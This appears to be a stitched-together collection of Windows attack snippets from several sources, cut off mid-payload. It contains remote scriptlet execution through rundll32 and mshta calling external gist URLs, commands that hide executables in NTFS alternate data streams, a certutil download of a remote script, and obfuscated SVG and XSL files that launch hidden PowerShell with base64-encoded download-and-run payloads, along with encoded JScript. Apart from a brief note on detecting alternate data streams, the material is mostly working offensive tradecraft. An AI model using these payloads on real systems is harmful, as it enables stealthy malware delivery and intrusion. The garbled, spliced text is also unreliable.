<?XML version="1.0"?>
<scriptlet>
<registration
progid="17807259"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var sBuffer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
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
cryptonic01 / Exe_ADS_Methods.txt
Created July 13, 2018 01:10 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
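# Add content to ADS (NTFS Alternate Data Streams)
In each command below, the stream name is the part after the colon that follows the host file or directory path. Named streams are not shown by a plain `dir`; `dir /R` lists them, and Sysmon event ID 15 (FileCreateStreamHash) records their creation.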
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
<RoOT XMlNS = "gzoprjonlbazvntlokftttscrjabkpkyvgrjzxrandsvlmrhedcywllhtcxxbygqaywgbjgiigrfobxmytqjnuoroufxndunwyimlecdygcjttfswcdegeuwfjdfiqugjdkeqsycjcijowjqadwnozznrszzztbnpmjmfkqwprqllwewitcoaqwhztbjaziypvmosqxctwhradjdy">
<script xmlns = "http://Www.W3.OrG/2000/svG" >
<![CDATA[
new ActiveXObject("wsCRiPT.sheLL").RuN( '"powErsheLL.EXe" POWersHEll.Exe -eX byPASS -NOp -w hIddEN -EC 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
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c powERSHElL.ExE -eX ByPASS -nOP -W HiDDeN -Ec CQAgACAAKAAJACAAIABOAGUAVwAtAE8AQgBKAGUAYwB0AAkADAAgACgAIAAJACAAJwBzAHkAUwBUAGUAbQAuAE4ARQAnACAADAAJACAADAAJACsAIAAMAAkAJwB0AC4AdwAnACAADAAJACAADAAJACsAIAAMAAkAJwBlAEIAYwBMAEkARQBOACcAIAAMAAkAIAAMAAkAKwAgAAwACQAnAHQAJwAgAAwACQAgAAsAIAApACAADAAgACkALgAoACAACwAgACcARABPAHcATgBMAE8AYQBEACcAIAAJACAAIAAJACAAKwAgAAkAIAAnAGYAaQBMAGUAJwAgAAkAIAAJAAsACQApAC4AaQBOAFYAbwBrAEUAKAAgAAkACQAoAFsAYwBoAEEAUgBdAAkACwAgADAAeAA2ADgACQALACAACQALACAAKwAJAAsAIABbAGMASABBAFIAXQAJAAsAIAAwAHgANwA0AAkACwAgAAkACwAgACsACQALACAAWwBDAGgAQQByAF0ACQALACAAMAB4ADcANAAJAAsAIAAJAAsAIAArAAkACwAgAFsAYwBIAEEAcgBdAAkACwAgADAAWAA3ADAACQALACAACQALACAAKwAJAAsAIABbAGMASABhAFIAXQAJAAsAIAAwAFgANwAzAAkACw
#@~^fwcAAA==7 dUhi dzmDr\(64N+^OvJU^I&nKcju+^Sr# IiUvd dEEnKh3.kC+ssc2a2r7 d7 Pqo+:d 7`]mul"T77,!(+0diPdi~QdiP]Zub]Did~!X{cid~7iP_77,$^tm]Yd7,!oGcid,7d,_7d,$/4zITi7PZ6GZ77Pid,_7d~,1tCDY7d,!a{2dd~7iPQdi~]Z4mDYdd,!Xfbid~diPQ7iP$;4bMTdi~T(ysid~d7~3d7P]^CmID7iP!a+wd7Pi7,_7iP]mtzIY7d,!avyd7~idP37d,$Z_C.Tid,!pv17iP7d,QdiP,^4bDD7iPT6F*id~id,_diP]/CmDDdiPTp+ di~diP_i7~$;CmIDd7~Z({*i7Pid~QidP,/4b.Ti7,!a+&idPid,QdiP,Z4b.DidPZpv~dd,77P3diP,muCMT7d,T(+*77,dd~Qid~$14zDDid,!6Fci7Pid~_id~,;tlMDdiP!o+3diPid~_77,$^tm]Tid~Tovs77,d7P37iP,;CzDTid,T(F 7d,d7~3dd,,m4bDY77PZ(+G7d~7iPQdi~$1t)]Ydd~TX odi~id~3diP$;tm.Tid~!ovo7iPdi~_idP]^4b"Tid~!p2d7Pi7P3d7~]mCC.Yd7PZaFc7iPidP3di~$1tCDYd7~Z6vw7d,dd,Q7d,$1C)DD7iPT(FTdiP77,_d7~]Z4lMDid~Z(F*diPi7P3d7P]Zu)MTdi~!oG&i7~diP3d7P,/_l.Ti7PZ6{idP77,_7d,,;tCMTidPZ(F+diP7d,_77,$m_CIYdd,TavwdiP7d~Qid~$;4bMT77,!({Xid~di~3d7,$1tb"Ti7PZ({!id~7iP_i7P]mtz]DdiPZ6+s77,d7P37d,$/4zDT77,!av87iP7iP3dd,$;4bMT7d,!p{Zdd,7d,_di~,m_l"T7d~TXG*di~diPQ7iP$/4mDDdi~Z(fydiPdiP37d,$^CmDD7iP!Xf!idPi7~_id,$/C)]Yd7PZp wd